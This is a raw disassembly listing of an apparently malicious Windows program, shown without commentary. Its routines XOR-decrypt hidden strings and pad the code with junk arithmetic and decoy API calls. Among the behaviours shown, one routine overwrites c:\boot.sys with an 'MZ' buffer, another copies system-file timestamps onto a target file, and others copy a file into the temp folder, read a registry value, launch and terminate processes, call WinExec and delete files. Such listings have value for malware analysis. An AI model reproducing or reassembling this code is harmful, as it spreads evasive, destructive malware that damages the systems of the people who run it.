loc_408065: ; CODE XREF: sub_408048+15E�j
; sub_408048+169�j ...
mov eax, [ebp+var_4]
mov edx, [ebp+arg_0]
cmp byte ptr [edx+eax], 3Ah
jnz loc_408179
mov [ebp+var_18], 723h
sub [ebp+var_18], 2278h
mov eax, [ebp+var_4]
mov edx, [ebp+arg_0]
cmp byte ptr [eax+edx+11h], 20h
jz short loc_40809B
cmp byte ptr [eax+edx+14h], 20h
jnz loc_408179
loc_40809B: ; CODE XREF: sub_408048+46�j
mov eax, [ebp+var_4]
inc eax
mov edx, [ebp+arg_0]
mov al, [edx+eax]
cmp al, 34h
jz short loc_4080B1
cmp al, 35h
jnz loc_408179
loc_4080B1: ; CODE XREF: sub_408048+5F�j
mov eax, [ebp+var_4]
add eax, 11h
mov edx, [ebp+arg_0]
cmp byte ptr [edx+eax], 20h
jnz short loc_4080C9
mov [ebp+var_8], 10h
jmp short loc_4080D0
; ---------------------------------------------------------------------------
loc_4080C9: ; CODE XREF: sub_408048+76�j
mov [ebp+var_8], 13h
loc_4080D0: ; CODE XREF: sub_408048+7F�j
mov [ebp+var_9], 0
xor ebx, ebx
jmp short loc_408150
; ---------------------------------------------------------------------------
loc_4080D8: ; CODE XREF: sub_408048+10B�j
call sub_40C7D0 ; GetVersion
cmp [ebp+var_8], 13h
jnz short loc_408119
mov eax, [ebp+var_4]
inc eax
add eax, ebx
mov edx, [ebp+arg_0]
cmp byte ptr [edx+eax], 2Dh
jnz short loc_408119
mov edi, 5
mov esi, ebx
inc esi
mov [ebp+var_1C], edi
mov eax, esi
mov ecx, edi
xor edx, edx
div ecx
mov [ebp+var_20], eax
mov eax, edi
mov edi, [ebp+var_20]
mul [ebp+var_20]
mov [ebp+var_24], eax
mov edi, eax
cmp edi, esi
jz short loc_40814F
loc_408119: ; CODE XREF: sub_408048+99�j
; sub_408048+A8�j
call sub_40C854 ; IsDebuggerPresent
mov eax, [ebp+var_4]
inc eax
add eax, ebx
mov edx, [ebp+arg_0]
mov al, [edx+eax]
cmp al, 30h
jl short loc_408132
cmp al, 39h
jle short loc_408134
loc_408132: ; CODE XREF: sub_408048+E4�j
jmp short loc_408179
; ---------------------------------------------------------------------------
loc_408134: ; CODE XREF: sub_408048+E8�j
movzx eax, [ebp+var_9]
mov edx, [ebp+var_4]
inc edx
add edx, ebx
mov ecx, [ebp+arg_0]
mov dl, [ecx+edx]
mov ds:byte_433FE0[eax], dl
add [ebp+var_9], 1
loc_40814F: ; CODE XREF: sub_408048+CF�j
inc ebx
loc_408150: ; CODE XREF: sub_408048+8E�j
cmp ebx, [ebp+var_8]
jb short loc_4080D8
mov eax, [ebp+var_8]
mov ds:byte_433FE0[eax], 0
call sub_40133B
or eax, eax
jz short loc_408170
call sub_40C734 ; GetCurrentProcessId
jmp short loc_408179
; ---------------------------------------------------------------------------
loc_408170: ; CODE XREF: sub_408048+11F�j
mov [ebp+var_10], 1
jmp short loc_4081E7
; ---------------------------------------------------------------------------
loc_408179: ; CODE XREF: sub_408048+27�j
; sub_408048+4D�j ...
inc [ebp+var_4]
mov eax, [ebp+var_4]
mov edx, [ebp+arg_0]
cmp byte ptr [edx+eax], 0
jz short loc_4081E3
mov [ebp+var_12], 2C6Eh
movzx eax, [ebp+var_12]
mov edx, eax
add edx, eax
mov eax, edx
mov [ebp+var_12], ax
mov eax, [ebp+var_4]
mov edx, [ebp+arg_0]
cmp byte ptr [edx+eax], 3Ch
jnz loc_408065
cmp byte ptr [eax+edx+1], 46h
jnz loc_408065
cmp byte ptr [eax+edx+2], 4Fh
jnz loc_408065
cmp byte ptr [eax+edx+3], 52h
jnz loc_408065
cmp byte ptr [eax+edx+4], 4Dh
jnz loc_408065
cmp byte ptr [eax+edx+5], 5Fh
jnz loc_408065
loc_4081E3: ; CODE XREF: sub_408048+13E�j
and [ebp+var_10], 0
loc_4081E7: ; CODE XREF: sub_408048+12F�j
cmp [ebp+var_10], 0
jz short loc_4081FC
mov eax, ds:dword_42FB14
mov dword_43C21C, eax
jmp loc_4082A6
; ---------------------------------------------------------------------------
loc_4081FC: ; CODE XREF: sub_408048+1A3�j
call sub_40C854 ; IsDebuggerPresent
push 0
push 0
push 4
push 0
push 0
push 40000000h
push offset dword_40E080
call sub_40C8CC ; CreateFileA
mov [ebp+var_1C], eax
mov [ebp+var_20], 7776h
add [ebp+var_20], 6412h
push 2
push 0
push 0
push eax
call sub_40C8D8 ; SetFilePointer
call sub_40C734 ; GetCurrentProcessId
mov eax, [ebp+arg_0]
mov ecx, eax
or eax, 0FFFFFFFFh
loc_408244: ; CODE XREF: sub_408048+201�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_408244
mov edi, eax
push 0
lea esi, [ebp+var_24]
push esi
push edi
push [ebp+arg_0]
push [ebp+var_1C]
call sub_40C944 ; WriteFile
lea edi, [ebp+var_2A]
lea esi, aQKy ; "~Q ky"
mov ecx, 6
rep movsb
push 2
push offset byte_446EB0
call sub_407FBC
add esp, 8
push 0
lea edi, [ebp+var_24]
push edi
mov edi, 14h
sub edi, dword_442440
push edi
push eax
push [ebp+var_1C]
call sub_40C944 ; WriteFile
call sub_40C7C4 ; GetTickCount
push [ebp+var_1C]
call sub_40C7AC ; CloseHandle
loc_4082A6: ; CODE XREF: sub_408048+1AF�j
pop edi
pop esi
pop ebx
leave
retn
sub_408048 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4082AB proc near ; CODE XREF: sub_40833E+76�p
; sub_40844F+DE�p ...
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push eax
push esi
push edi
mov esi, [ebp+arg_4]
mov [ebp+var_4], 0Dh
push esi
push [ebp+arg_0]
mov eax, dword_446458
lea eax, ds:40D000h[eax]
push eax
call sub_40CC14
add esp, 0Ch
xor edi, edi
jmp short loc_4082F0
; ---------------------------------------------------------------------------
loc_4082D9: ; CODE XREF: sub_4082AB+47�j
mov eax, dword_446458
add eax, edi
lea eax, ds:40D000h[eax]
movsx edx, byte ptr [eax]
xor edx, 3Ah
mov [eax], dl
inc edi
loc_4082F0: ; CODE XREF: sub_4082AB+2C�j
cmp edi, esi
jl short loc_4082D9
mov eax, dword_446458
add eax, esi
mov byte ptr ds:dword_40D000[eax], 0
xor edi, edi
mov edi, dword_446458
inc dword_446458
mov eax, dword_446458
lea eax, [eax+esi+6]
mov dword_446458, eax
cmp eax, 0DFAh
jle short loc_40832D
and dword_446458, 0
loc_40832D: ; CODE XREF: sub_4082AB+79�j
mov [ebp+var_8], 337h
lea eax, dword_40D000[edi]
pop edi
pop esi
leave
retn
sub_4082AB endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40833E proc near ; CODE XREF: sub_40844F+90�p
var_22C = word ptr -22Ch
var_22A = byte ptr -22Ah
var_222 = byte ptr -222h
var_21A = byte ptr -21Ah
var_212 = dword ptr -212h
var_20E = byte ptr -20Eh
var_109 = byte ptr -109h
var_108 = word ptr -108h
var_105 = byte ptr -105h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 22Ch
push esi
push edi
call sub_40C7C4 ; GetTickCount
mov eax, dword_44645C
mov [ebp+var_212], eax
mov [ebp+var_108], 1671h
movzx eax, [ebp+var_108]
imul eax, 49FCh
mov [ebp+var_108], ax
push 104h
lea eax, [ebp+var_20E]
push eax
call sub_40C7A0 ; GetSystemDirectoryA
mov [ebp+var_109], 7Ch
add [ebp+var_109], 1
lea eax, [ebp+var_20E]
push eax
lea eax, [ebp+var_105]
push eax
call sub_40C6D8
call sub_40C7D0 ; GetVersion
push 0Dh
push offset word_446EA2
call sub_4082AB
push eax
lea esi, [ebp+var_105]
push esi
call sub_40CC74
add esp, 10h
push 0
push 0
push 3
push 0
push 0
push 80000001h
lea eax, [ebp+var_105]
push eax
call sub_40C8CC ; CreateFileA
mov edi, eax
cmp edi, 0FFFFFFFFh
jz short loc_40844B
call sub_40C764 ; RtlGetLastWin32Error
lea eax, [ebp+var_22A]
push eax
lea eax, [ebp+var_222]
push eax
lea eax, [ebp+var_21A]
push eax
push edi
call sub_40C758 ; GetFileTime
lea eax, [ebp+var_22A]
push eax
lea eax, [ebp+var_222]
push eax
lea eax, [ebp+var_21A]
push eax
push [ebp+arg_0]
call sub_40C8E4 ; SetFileTime
push edi
call sub_40C7AC ; CloseHandle
mov [ebp+var_22C], 0BCFh
movzx eax, [ebp+var_22C]
mov edx, eax
add edx, eax
mov eax, edx
mov [ebp+var_22C], ax
loc_40844B: ; CODE XREF: sub_40833E+AB�j
pop edi
pop esi
leave
retn
sub_40833E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40844F proc near ; CODE XREF: sub_40AA24+8D�p
var_22B = byte ptr -22Bh
var_228 = byte ptr -228h
var_220 = byte ptr -220h
var_21B = byte ptr -21Bh
var_218 = byte ptr -218h
var_114 = byte ptr -114h
var_108 = word ptr -108h
var_105 = byte ptr -105h
var_104 = byte ptr -104h
push ebp
mov ebp, esp
sub esp, 22Ch
push ebx
push esi
push edi
call sub_40C7D0 ; GetVersion
call sub_40C7D0 ; GetVersion
cmp eax, 80000000h
jnb loc_4085A0
lea edi, [ebp+var_114]
lea esi, aCBoot_sys ; "c:\\boot.sys"
mov ecx, 3
rep movsd
lea edi, [ebp+var_21B]
lea esi, aRi ; "rI"
mov ecx, 3
rep movsb
push 0
push 0
push 2
push 0
push 0
push 40000000h
lea eax, [ebp+var_114]
push eax
call sub_40C8CC ; CreateFileA
mov ebx, eax
mov [ebp+var_108], 7171h
sub [ebp+var_108], 3D17h
push 0
lea eax, [ebp+var_220]
push eax
push 4001h
push offset aMzr ; "MZ"
push ebx
call sub_40C944 ; WriteFile
push ebx
call sub_40833E
call sub_40C740 ; GetCurrentThreadId
push ebx
call sub_40C7AC ; CloseHandle
lea edi, [ebp+var_228]
lea esi, byte_44646F
mov ecx, 2
rep movsd
lea edi, [ebp+var_22B]
lea esi, byte_446477
mov ecx, 3
rep movsb
push 104h
lea eax, [ebp+var_104]
push eax
call sub_40C7A0 ; GetSystemDirectoryA
push 0Ah
push offset byte_446E97
call sub_4082AB
lea edi, [ebp+var_104]
push edi
push eax
lea edi, [ebp+var_218]
push edi
call sub_40CC50
call sub_40C740 ; GetCurrentThreadId
push 1Dh
push offset byte_446E79
call sub_4082AB
push eax
lea edi, [ebp+var_104]
push edi
call sub_40CC74
add esp, 28h
call sub_40C740 ; GetCurrentThreadId
lea eax, [ebp+var_218]
push eax
call sub_40C704 ; DeleteFileA
mov [ebp+var_105], 45h
movzx eax, [ebp+var_105]
mov edx, eax
add edx, eax
mov eax, edx
mov [ebp+var_105], al
push 0
lea eax, [ebp+var_104]
push eax
call sub_40C938 ; WinExec
loc_4085A0: ; CODE XREF: sub_40844F+1B�j
pop edi
pop esi
pop ebx
leave
retn
sub_40844F endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 0Ch
push esi
push edi
mov esi, [ebp+0Ch]
push esi
push dword ptr [ebp+8]
mov eax, dword_446504
lea eax, ds:432DD0h[eax]
push eax
call sub_40CC14
add esp, 0Ch
mov dword ptr [ebp-4], 1E6h
xor edi, edi
jmp short loc_4085EB
; ---------------------------------------------------------------------------
loc_4085D4: ; CODE XREF: .text:004085ED�j
mov eax, dword_446504
add eax, edi
lea eax, ds:432DD0h[eax]
movsx edx, byte ptr [eax]
xor edx, 0Fh
mov [eax], dl
inc edi
loc_4085EB: ; CODE XREF: .text:004085D2�j
cmp edi, esi
jl short loc_4085D4
mov dword ptr [ebp-8], 237h
mov eax, dword_446504
add eax, esi
mov byte ptr ds:dword_432DD0[eax], 0
xor edi, edi
mov edi, dword_446504
add dword_446504, 2
mov eax, dword_446504
add eax, 6
add eax, esi
mov dword_446504, eax
add dword_446504, 2
cmp dword_446504, 0DC4h
jle short loc_40863D
and dword_446504, 0
loc_40863D: ; CODE XREF: .text:00408634�j
mov dword ptr [ebp-0Ch], 65h
lea eax, dword_432DD0[edi]
pop edi
pop esi
leave
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40864E proc near ; CODE XREF: sub_408779+43�p
var_2 = byte ptr -2
var_1 = byte ptr -1
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
call sub_40C7D0 ; GetVersion
push 4
push 1000h
push [ebp+arg_0]
push 0
call sub_40C908 ; VirtualAlloc
jmp short locret_40867B
; ---------------------------------------------------------------------------
mov [ebp+var_1], 3Fh
movzx eax, [ebp+var_1]
mov edx, eax
add edx, eax
mov eax, edx
mov [ebp+var_1], al
locret_40867B: ; CODE XREF: sub_40864E+1A�j
leave
retn
sub_40864E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40867D proc near ; CODE XREF: sub_408779+E6�p
arg_0 = dword ptr 8
push ebp
mov ebp, esp
call sub_40C740 ; GetCurrentThreadId
push 8000h
push 0
push [ebp+arg_0]
call sub_40C914 ; VirtualFree
jmp short loc_40869B
; ---------------------------------------------------------------------------
call sub_40C794 ; GetProcessHeap
loc_40869B: ; CODE XREF: sub_40867D+17�j
pop ebp
retn
sub_40867D endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 10h
push esi
push edi
mov esi, [ebp+0Ch]
mov dword ptr [ebp-4], 2A0h
push esi
push dword ptr [ebp+8]
mov eax, dword_446510
lea eax, ds:43A570h[eax]
push eax
call sub_40CC14
add esp, 0Ch
mov dword ptr [ebp-8], 2B3h
xor edi, edi
jmp short loc_4086ED
; ---------------------------------------------------------------------------
loc_4086D3: ; CODE XREF: .text:004086EF�j
mov eax, dword_446510
add eax, edi
lea eax, ds:43A570h[eax]
movsx edx, byte ptr [eax]
xor edx, 0F6h
mov [eax], dl
inc edi
loc_4086ED: ; CODE XREF: .text:004086D1�j
cmp edi, esi
jl short loc_4086D3
mov dword ptr [ebp-0Ch], 25h
mov eax, dword_446510
add eax, esi
mov byte ptr ds:dword_43A570[eax], 0
mov edi, dword_446510
inc dword_446510
mov eax, dword_446510
add eax, 5
add eax, esi
mov dword_446510, eax
cmp eax, 0E06h
jle short loc_408730
and dword_446510, 0
loc_408730: ; CODE XREF: .text:00408727�j
mov dword ptr [ebp-10h], 20Bh
lea eax, dword_43A570[edi]
pop edi
pop esi
leave
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_408741 proc near ; CODE XREF: sub_408779+103�p
var_4 = word ptr -4
var_1 = byte ptr -1
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
mov [ebp+var_4], 19C3h
sub [ebp+var_4], 4EAAh
push offset dword_4464BC
push offset dword_44647C
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40BC80
mov [ebp+var_1], 19h
movzx eax, [ebp+var_1]
mov edx, eax
add edx, eax
mov eax, edx
mov [ebp+var_1], al
leave
retn
sub_408741 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_408779 proc near ; CODE XREF: sub_4098A8+4E0�p
var_71 = word ptr -71h
var_6F = byte ptr -6Fh
var_6C = dword ptr -6Ch
var_68 = byte ptr -68h
var_62 = byte ptr -62h
var_22 = word ptr -22h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = byte ptr -14h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 74h
push ebx
push esi
push edi
mov ebx, [ebp+arg_0]
call sub_40C794 ; GetProcessHeap
lea edi, [ebp+var_68]
lea esi, a@8wz ; " @8WZ"
mov ecx, 3
rep movsw
call sub_40C7D0 ; GetVersion
mov eax, dword_44651A
mov [ebp+var_6C], eax
mov eax, [ebp+arg_4]
add eax, 40h
jge short loc_4087B3
add eax, 3Fh
loc_4087B3: ; CODE XREF: sub_408779+35�j
sar eax, 6
mov edi, eax
shl edi, 6
push edi
call sub_40864E
pop ecx
mov [ebp+var_18], eax
mov [ebp+var_22], 7A30h
sub [ebp+var_22], 748Fh
mov eax, [ebp+arg_4]
add eax, 40h
jge short loc_4087DC
add eax, 3Fh
loc_4087DC: ; CODE XREF: sub_408779+5E�j
sar eax, 6
mov edi, eax
shl edi, 6
push edi
push [ebp+var_18]
call sub_40C8C0 ; RtlZeroMemory
lea edi, [ebp+var_6F]
lea esi, word_44651E
mov ecx, 3
rep movsb
push [ebp+arg_4]
push ebx
push [ebp+var_18]
call sub_40CC14
add esp, 0Ch
mov [ebp+var_1C], 2FF0h
mov eax, [ebp+var_1C]
mov edx, eax
add edx, eax
mov [ebp+var_1C], edx
lea eax, [ebp+var_14]
push eax
call sub_40BDBE
mov ebx, [ebp+var_18]
and [ebp+var_4], 0
jmp short loc_408849
; ---------------------------------------------------------------------------
loc_40882F: ; CODE XREF: sub_408779+E1�j
mov ax, word_446521
mov [ebp+var_71], ax
push ebx
lea eax, [ebp+var_14]
push eax
call sub_40BDE5
add ebx, 40h
inc [ebp+var_4]
loc_408849: ; CODE XREF: sub_408779+B4�j
mov eax, [ebp+arg_4]
add eax, 40h
jge short loc_408854
add eax, 3Fh
loc_408854: ; CODE XREF: sub_408779+D6�j
sar eax, 6
cmp [ebp+var_4], eax
jl short loc_40882F
push [ebp+var_18]
call sub_40867D
mov [ebp+var_20], 2FAh
mov eax, [ebp+var_20]
mov edx, eax
add edx, eax
mov [ebp+var_20], edx
lea eax, [ebp+var_62]
push eax
push [ebp+arg_8]
call sub_408741
mov eax, dword_44650C
add eax, 2
push eax
lea eax, [ebp+var_14]
push eax
lea eax, [ebp+var_62]
push eax
call sub_40CC08
add esp, 18h
or eax, eax
jz short loc_4088A3
xor eax, eax
inc eax
jmp short loc_4088AA
; ---------------------------------------------------------------------------
loc_4088A3: ; CODE XREF: sub_408779+123�j
call sub_40C854 ; IsDebuggerPresent
xor eax, eax
loc_4088AA: ; CODE XREF: sub_408779+128�j
pop edi
pop esi
pop ebx
leave
retn
sub_408779 endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 0Ch
push esi
push edi
mov esi, [ebp+0Ch]
push esi
push dword ptr [ebp+8]
mov eax, dword_44652C
lea eax, ds:439560h[eax]
push eax
call sub_40CC14
add esp, 0Ch
mov dword ptr [ebp-4], 2A0h
xor edi, edi
jmp short loc_4088F5
; ---------------------------------------------------------------------------
loc_4088DE: ; CODE XREF: .text:004088F7�j
mov eax, dword_44652C
add eax, edi
lea eax, ds:439560h[eax]
movsx edx, byte ptr [eax]
xor edx, 1Bh
mov [eax], dl
inc edi
loc_4088F5: ; CODE XREF: .text:004088DC�j
cmp edi, esi
jl short loc_4088DE
mov dword ptr [ebp-8], 29Ch
mov eax, dword_44652C
add eax, esi
mov byte ptr ds:dword_439560[eax], 0
mov edi, dword_44652C
mov eax, edi
inc eax
add eax, esi
mov dword_44652C, eax
cmp eax, 0DDFh
jle short loc_40892D
and dword_44652C, 0
loc_40892D: ; CODE XREF: .text:00408924�j
mov dword ptr [ebp-0Ch], 0D8h
lea eax, dword_439560[edi]
pop edi
pop esi
leave
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40893E proc near ; CODE XREF: sub_4098A8+413�p
; sub_4098A8+42B�p
var_35 = byte ptr -35h
var_34 = byte ptr -34h
var_2C = dword ptr -2Ch
var_25 = byte ptr -25h
var_20 = byte ptr -20h
var_1E = word ptr -1Eh
var_1B = byte ptr -1Bh
var_15 = byte ptr -15h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 38h
push ebx
push esi
push edi
call sub_40C7D0 ; GetVersion
lea edi, [ebp+var_1B]
lea esi, aVlvh__0 ; "vlVh_"
mov ecx, 3
rep movsw
xor eax, eax
mov [ebp+var_10], eax
mov [ebp+var_14], eax
mov [ebp+var_4], eax
mov eax, [ebp+arg_4]
mov [ebp+var_8], eax
mov eax, [ebp+arg_8]
add eax, [ebp+var_8]
mov [ebp+var_C], eax
mov ebx, [ebp+arg_0]
jmp loc_408A7F
; ---------------------------------------------------------------------------
loc_40897F: ; CODE XREF: sub_40893E+14C�j
lea edi, [ebp+var_20]
lea esi, aHu ; ": hu"
mov ecx, 5
rep movsb
movsx edi, byte ptr [ebx]
shl edi, 2
mov edi, dword_446538[edi]
mov [ebp+var_4], edi
call sub_40C764 ; RtlGetLastWin32Error
cmp edi, 0FFFFFFFFh
jz loc_408A7E
call sub_40C740 ; GetCurrentThreadId
mov eax, [ebp+var_10]
or eax, eax
jl loc_408A78
cmp eax, 3
jg loc_408A78
jmp off_446948[eax*4]
; ---------------------------------------------------------------------------
mov [ebp+var_25], 38h
sub [ebp+var_25], 0BCh
loc_4089D5: ; CODE XREF: sub_40893E+88�j
; DATA XREF: .data:off_446948�o
inc [ebp+var_10]
lea edi, [ebp+var_34]
lea esi, a1bOt ; "/1~oT:"
movsd
movsd
jmp loc_408A78
; ---------------------------------------------------------------------------
loc_4089E8: ; CODE XREF: sub_40893E+88�j
; DATA XREF: .data:0044694C�o
mov edi, [ebp+var_14]
shl edi, 2
mov esi, [ebp+var_4]
and esi, 30h
sar esi, 4
or edi, esi
mov edx, edi
mov [ebp+var_15], dl
call sub_40C764 ; RtlGetLastWin32Error
mov eax, [ebp+var_8]
inc [ebp+var_8]
mov dl, [ebp+var_15]
mov [eax], dl
inc [ebp+var_10]
jmp short loc_408A78
; ---------------------------------------------------------------------------
loc_408A13: ; CODE XREF: sub_40893E+88�j
; DATA XREF: .data:00446950�o
mov edi, [ebp+var_14]
and edi, 0Fh
shl edi, 4
mov esi, [ebp+var_4]
and esi, 3Ch
sar esi, 2
or edi, esi
mov edx, edi
mov [ebp+var_15], dl
lea edi, [ebp+var_35]
lea esi, byte_446945
xor ecx, ecx
inc ecx
rep movsb
mov eax, [ebp+var_8]
inc [ebp+var_8]
mov dl, [ebp+var_15]
mov [eax], dl
inc [ebp+var_10]
jmp short loc_408A78
; ---------------------------------------------------------------------------
loc_408A4A: ; CODE XREF: sub_40893E+88�j
; DATA XREF: .data:00446954�o
mov edi, [ebp+var_14]
and edi, 3
shl edi, 6
or edi, [ebp+var_4]
mov edx, edi
mov [ebp+var_15], dl
mov [ebp+var_2C], 6257h
add [ebp+var_2C], 0D1Fh
mov eax, [ebp+var_8]
inc [ebp+var_8]
mov dl, [ebp+var_15]
mov [eax], dl
and [ebp+var_10], 0
loc_408A78: ; CODE XREF: sub_40893E+79�j
; sub_40893E+82�j ...
mov eax, [ebp+var_4]
mov [ebp+var_14], eax
loc_408A7E: ; CODE XREF: sub_40893E+69�j
inc ebx
loc_408A7F: ; CODE XREF: sub_40893E+3C�j
cmp byte ptr [ebx], 0
jz short loc_408A90
mov eax, [ebp+var_C]
cmp [ebp+var_8], eax
jb loc_40897F
loc_408A90: ; CODE XREF: sub_40893E+144�j
cmp byte ptr [ebx], 0
jnz short loc_408AB1
mov [ebp+var_1E], 214Eh
movzx eax, [ebp+var_1E]
imul eax, 7B26h
mov [ebp+var_1E], ax
mov eax, [ebp+var_8]
sub eax, [ebp+arg_4]
jmp short loc_408AB4
; ---------------------------------------------------------------------------
loc_408AB1: ; CODE XREF: sub_40893E+155�j
or eax, 0FFFFFFFFh
loc_408AB4: ; CODE XREF: sub_40893E+171�j
pop edi
pop esi
pop ebx
leave
retn
sub_40893E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_408AB9 proc near ; CODE XREF: sub_408B4C+88�p
; sub_408B4C+E4�p ...
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 0Ch
push esi
push edi
mov esi, [ebp+arg_4]
push esi
push [ebp+arg_0]
mov eax, dword_446960
lea eax, ds:413F30h[eax]
push eax
call sub_40CC14
add esp, 0Ch
mov [ebp+var_4], 278h
xor edi, edi
jmp short loc_408B02
; ---------------------------------------------------------------------------
loc_408AE8: ; CODE XREF: sub_408AB9+4B�j
mov eax, dword_446960
add eax, edi
lea eax, ds:413F30h[eax]
movsx edx, byte ptr [eax]
xor edx, 9Ah
mov [eax], dl
inc edi
loc_408B02: ; CODE XREF: sub_408AB9+2D�j
cmp edi, esi
jl short loc_408AE8
mov [ebp+var_8], 2C7h
mov eax, dword_446960
add eax, esi
mov byte ptr ds:dword_413F30[eax], 0
mov edi, dword_446960
mov eax, edi
lea eax, [eax+esi+6]
mov dword_446960, eax
cmp eax, 0DB8h
jle short loc_408B3B
and dword_446960, 0
loc_408B3B: ; CODE XREF: sub_408AB9+79�j
mov [ebp+var_C], 2EEh
lea eax, dword_413F30[edi]
pop edi
pop esi
leave
retn
sub_408AB9 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_408B4C proc near ; CODE XREF: sub_4098A8:loc_40A8A0�p
var_38C = dword ptr -38Ch
var_388 = dword ptr -388h
var_383 = dword ptr -383h
var_37F = byte ptr -37Fh
var_378 = byte ptr -378h
var_372 = word ptr -372h
var_370 = dword ptr -370h
var_36C = dword ptr -36Ch
var_365 = byte ptr -365h
var_261 = dword ptr -261h
var_25D = dword ptr -25Dh
var_251 = byte ptr -251h
var_250 = byte ptr -250h
var_24F = byte ptr -24Fh
var_24E = byte ptr -24Eh
var_14A = word ptr -14Ah
var_148 = dword ptr -148h
var_11C = dword ptr -11Ch
var_118 = word ptr -118h
var_104 = byte ptr -104h
push ebp
mov ebp, esp
sub esp, 38Ch
push ebx
push esi
push edi
call sub_40C854 ; IsDebuggerPresent
mov eax, dword_446964
mov [ebp+var_370], eax
call sub_40C740 ; GetCurrentThreadId
lea eax, [ebp+var_104]
push eax
push 104h
call sub_40C7B8 ; GetTempPathA
mov [ebp+var_14A], 21A4h
movzx eax, [ebp+var_14A]
mov edx, eax
add edx, eax
mov eax, edx
mov [ebp+var_14A], ax
lea ecx, [ebp+var_104]
or eax, 0FFFFFFFFh
loc_408BA4: ; CODE XREF: sub_408B4C+5D�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_408BA4
mov edi, eax
mov esi, dword_446958
add esi, 1
push esi
lea esi, [ebp+var_104]
add esi, edi
push esi
call sub_40172F
add esp, 8
call sub_40C854 ; IsDebuggerPresent
push 4
push offset dword_446E74
call sub_408AB9
add esp, 8
push eax
lea edi, [ebp+var_104]
push edi
call sub_40CC74
add esp, 8
push 0
lea eax, [ebp+var_104]
push eax
push offset dword_41E8D0
call sub_40C86C ; CopyFileA
call sub_40C764 ; RtlGetLastWin32Error
mov ax, word_446968
mov [ebp+var_372], ax
mov [ebp+var_36C], 104h
mov [ebp+var_24F], 22h
sub [ebp+var_24F], 0CDh
push 21h
push offset word_446E52
call sub_408AB9
add esp, 8
mov [ebp+var_388], eax
push 4
push offset byte_446E4D
call sub_408AB9
add esp, 8
lea edi, [ebp+var_378]
push edi
lea edi, [ebp+var_36C]
push edi
lea edi, [ebp+var_365]
push edi
push eax
mov edi, [ebp+var_388]
push [ebp+var_388]
push 80000002h
call sub_4014C9
add esp, 18h
mov ebx, eax
call sub_40C854 ; IsDebuggerPresent
cmp ebx, 0
jz loc_408E0D
call sub_40C794 ; GetProcessHeap
lea edi, [ebp+var_37F]
lea esi, a99a_0 ; "-; 99a"
mov ecx, 7
rep movsb
push 104h
lea eax, [ebp+var_24E]
push eax
lea eax, [ebp+var_365]
push eax
call sub_40C71C ; ExpandEnvironmentStringsA
call sub_40C7D0 ; GetVersion
push 0Eh
push offset word_446E3E
call sub_408AB9
push eax
lea edi, [ebp+var_24E]
push edi
call sub_40CC74
call sub_40C7C4 ; GetTickCount
lea eax, [ebp+var_104]
push eax
lea eax, [ebp+var_24E]
push eax
call sub_40CC74
call sub_40C764 ; RtlGetLastWin32Error
call sub_4043CA
mov ebx, eax
mov eax, dword_446971
mov [ebp+var_383], eax
push 44h
push 0
lea eax, [ebp+var_148]
push eax
call sub_40CC20
push 44h
push 0
lea eax, [ebp+var_148]
push eax
call sub_40CC20
add esp, 30h
mov [ebp+var_250], 69h
add [ebp+var_250], 1
mov [ebp+var_148], 44h
mov [ebp+var_251], 19h
movzx eax, [ebp+var_251]
imul eax, 1598h
mov [ebp+var_251], al
mov [ebp+var_11C], 1
mov [ebp+var_118], 1
or ebx, ebx
jz short loc_408D84
lea eax, [ebp+var_148]
push eax
call sub_40446E
pop ecx
jmp short loc_408D8D
; ---------------------------------------------------------------------------
loc_408D84: ; CODE XREF: sub_408B4C+227�j
mov [ebp+var_118], 0
loc_408D8D: ; CODE XREF: sub_408B4C+236�j
lea eax, [ebp+var_261]
push eax
lea eax, [ebp+var_148]
push eax
push 0
push 0
push 20h
push 0
push 0
push 0
lea eax, [ebp+var_24E]
push eax
push 0
call sub_40C974 ; CreateProcessA
or eax, eax
jz short loc_408E01
call sub_40C734 ; GetCurrentProcessId
push [ebp+var_25D]
call sub_40C7AC ; CloseHandle
mov eax, dword_446975
mov [ebp+var_38C], eax
push 0EA60h
call sub_40CBD8
pop ecx
call sub_40C854 ; IsDebuggerPresent
push 0
push [ebp+var_261]
call sub_40C8FC ; TerminateProcess
push [ebp+var_261]
call sub_40C7AC ; CloseHandle
call sub_40C740 ; GetCurrentThreadId
loc_408E01: ; CODE XREF: sub_408B4C+26B�j
lea eax, [ebp+var_104]
push eax
call sub_40C704 ; DeleteFileA
loc_408E0D: ; CODE XREF: sub_408B4C+13A�j
pop edi
pop esi
pop ebx
leave
retn
